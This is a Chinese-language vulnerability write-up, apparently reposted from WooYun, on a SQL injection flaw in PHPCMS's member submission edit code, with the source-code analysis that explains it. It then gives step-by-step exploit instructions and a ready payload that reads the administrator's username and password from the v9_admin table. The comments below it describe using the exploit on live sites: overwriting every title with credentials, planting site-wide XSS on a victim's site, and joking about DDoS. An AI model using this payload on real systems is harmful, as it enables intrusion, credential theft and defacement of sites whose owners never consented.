PHPCMS全版本通杀SQL注入漏洞

漏洞分析 首先看下面的代码 /phpcms/modules/member/content.php 202行 edit函数 [php] public function edit() { $_username = $this->memberinfo['username']; if(isset($_POST['dosubmit'])) { $catid = $_POST['info']['catid'] = intval($_POST['info']['catid']); $siteids = getcache('category_content', 'commons'); $siteid = $siteids[$catid]; $CATEGORYS = getcache('category_content_'.$siteid, 'commons'); $category = $CATEGORYS[$catid]; if($category['type']==0) {//审核状态时,点编辑 再提交,进入if分支 $id = intval($_POST['id']); $catid = $_POST['info']['catid'] = intval($_POST['info']['catid']); $this->content_db = pc_base::load_model('content_model'); $modelid = $category['modelid']; $this->content_db->set_model($modelid); //判断会员组投稿是否需要审核 $memberinfo = $this->memberinfo; $grouplist = getcache('grouplist'); $setting = string2array($category['setting']); if(!$grouplist[$memberinfo['groupid']]['allowpostverify'] || $setting['workflowid']) { $_POST['info']['status'] = 1; } $info = array(); foreach($_POST['info'] as $_k=>$_v) { if(in_array($_k, $fields)) $_POST['info'][$_k] = ew_html_special_chars(trim_script($_v)); } $_POST['linkurl'] = str_replace(array('"','(',')',",",' '),'',new_html_special_chars($_POST['linkurl'])); //exit(print_r($_POST['info'])); $this->content_db->edit_content($_POST['info'],$id); $forward = $_POST['forward']; showmessage(L('update_success'),$forward); } } else { //... }[/php] 229行 [php] $this->content_db->edit_content($_POST['info'],$id);[/php] 其中 $_POST['info'] 参数是一个数组,其内容是在线投稿的各项内容,如图所示 1 好了,接下来我们看看这些数据都经过了怎样的处理... 跟上edit_content函数 /phpcms/model/content_model.class.php 第234行开始 [php] public function edit_content($data,$id) { $model_tablename = $this->model_tablename; //前台权限判断 if(!defined('IN_ADMIN')) { $_username = param::get_cookie('_username'); $us = $this->get_one(array('id'=>$id,'username'=>$_username)); if(!$us) return false; } $this->search_db = pc_base::load_model('search_model'); require_once CACHE_MODEL_PATH.'content_input.class.php'; require_once CACHE_MODEL_PATH.'content_update.class.php'; $content_input = new content_input($this->modelid); $inputinfo = $content_input->get($data);//跟进此函数 // /caches/caches_model/caches_data/content_input.class.php get函数 $systeminfo = $inputinfo['system']; [/php] 第248行,我们可以看到 $_POST['info'] 数组进入了 get 函数,继续跟进 /caches/caches_model/caches_data/content_input.class.php 第55行开始 [php] if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips); $MODEL = getcache('model', 'commons'); $this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data'; if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat')); $func = $this->fields[$field]['formtype']; if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明 if($this->fields[$field]['issystem']) { $info['system'][$field] = $value; } else { $info['model'][$field] = $value; }[/php] 我们重点关注这里是怎么处理的 [php] if(method_exists($this, $func)) $value = $this->$func($field, $value); [/php] 为了方便看清楚程序在这里究竟是怎样处理的,我们在这行代码前面加入以下调试代码,看看都经过了哪些函数的处理... [php] if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips); $MODEL = getcache('model', 'commons'); $this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data'; if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat')); $func = $this->fields[$field]['formtype']; echo "
Function :-->".$func."<--
";//这是添加的调试代码 if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明 if($this->fields[$field]['issystem']) { $info['system'][$field] = $value; } else { $info['model'][$field] = $value; }[/php] 编辑投稿内容,提交 2 看见了吧,我们提交的内容经过了如下几个函数:catid title keyword copyform textarea editor image islink box 经过分析后,我们重点关注image函数,继续跟上 /caches/caches_model/caches_data/content_input.class.php 第102行 image函数 [php] function image($field, $value) { $value = str_replace(array("'",'"','(',')'),'',$value); return trim($value); }[/php] 过滤了"'"、"("、")",但是呢 我们知道当开启了GPC的时候,单引号会被转义 '-->\' 明白了吧? image函数过滤了单引号,假设我们提交的数据恰巧经过了image函数,则单引号被过滤了,留下"\",那么这个"\"将会吃掉一个单引号,造成注入 #3 漏洞Poc 条件:后台开启投稿,并要求审核 step1 在会员中心随便投一篇文章,提交 step2 点击编辑,如下 3 step3 在缩略图栏填入 http://www.vulns.org/sql.jpg',如图 4 提交后,报错了... 5 # 漏洞最终利用Exp 在缩略图栏填入:http://www.vulns.org/sql.jpg' 点击提交,采用Tamper data抓包修改,将info[islink]修改为 [php] ,title=(select concat(username,password) from v9_admin where userid=1) -- felixk3y [/php] 点击确定,再点编辑 即可读取管理员账号 密码,如图 6 from:felixk3y@wooyun.org

16 条评论

  1. jf_web

    不开启会员,问题不大吧[呵呵]

    1. 没穿底裤
      @jf_web

      不大

  2. aja

    貌似注册会员中心很难~……都提示注册失败

    1. 0day5
      @aja

      通常那种都是会员注册呗破坏掉了的~

  3. 路人丙

    大牛~这个是要在gpc为on的情况下才可以利用么?

  4. selina

    大媳妇~ :idea:

    1. 0day5
      @selina

      么么哒~

  5. heihui

    来看一下啊

    1. 0day5
      @heihui

      看麻子~

  6. 擦,破坏力太大了这个方式,所有的标题全部暴成密码了

    1. 0day5
      @擦

      还好吧~只是在当前页面显示了而已

      1. @0day5

        ,title=(select concat(username,password) from v9_admin where userid=1) wherer id=文章id-- felixk3y#,一定要加上 wherer id=文章id 不然悲剧

      2. @0day5

        no,全部被杀了。我找不到后台直接在对方title写进去xss,结果全站xss。管理员估计恨透我鸟

        1. 0day5
          @擦

          可以引用来搞DDOS了~

  7. admin2B

    :evil: :evil: 好屌的样子

    1. 0day5
      @admin2B

      cool`其实挖这个洞的才是牛逼的

发表评论